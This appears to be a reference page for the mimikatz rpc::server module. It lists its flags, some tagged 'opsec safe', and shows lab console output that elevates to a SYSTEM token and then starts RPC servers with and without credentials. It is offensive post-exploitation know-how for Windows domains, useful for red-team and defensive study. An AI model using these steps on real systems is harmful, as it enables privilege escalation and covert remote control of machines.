Links
Comment on page

server

rpc::server can be used to start an RPC server. It has the following command line arguments:
  • /stop: terminates the RPC connection
  • /guid: the guid for the RPC endpoint (opsec safe)
  • /noreg: to not register the RPC binding
  • /secure: only secure connections are accepted
  • /altservice: alter the rpc service name (opsec safe)
  • /negotiate: the default authentication mechanism GSS_NEGOTIATE (9).
  • /ntlm: use NTLM authentication WINNT (10).
  • /kerberos: use Kerberos authentication GSS_KERBEROS (16).
  • /authuser: the user for authentication
  • /authdomain: the domain of the authuser
  • /authpassword: the authuser's password
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
752 {0;000003e7} 0 D 44299 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary
-> Impersonated !
* Process Token : {0;002cfce0} 4 F 118309013 hacklab\m3g9tr0n S-1-5-21-2725560159-1428537199-2260736313-1730 (13g,24p) Primary
* Thread Token : {0;000003e7} 0 D 118617400 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Impersonation (Delegation)
Without authentication
With authentication
An RPC server can be started without an authentication requirement.
mimikatz # rpc::server
[rpc] ProtSeq : ncacn_ip_tcp
[rpc] Endpoint : (null)
[rpc] Service : (null)
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Map Reg.: yes
Security: Allow no auth
mimikatz # > BindString[0]: ncacn_ip_tcp:DC[61057]
> RPC bind registered
> RPC Server is waiting!
An RPC server can be started with an authentication requirement.
mimikatz # rpc::server /secure /authuser:m3g9tr0n /authdomain:hacklab.local /authpassword:Super_SecretPass!
[rpc] ProtSeq : ncacn_ip_tcp
[rpc] Endpoint : (null)
[rpc] Service : (null)
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Map Reg.: yes
Security: Secure only
mimikatz # > BindString[0]: ncacn_ip_tcp:DC[61057]
> RPC bind registered
> RPC Server is waiting!
mimikatz # ** Security Callback! **
> ServerPrincName:
> AuthnLevel : 6 - PKT_PRIVACY
> AuthnSvc : 10 - WINNT
> AuthzSvc : 0
Last modified 1yr ago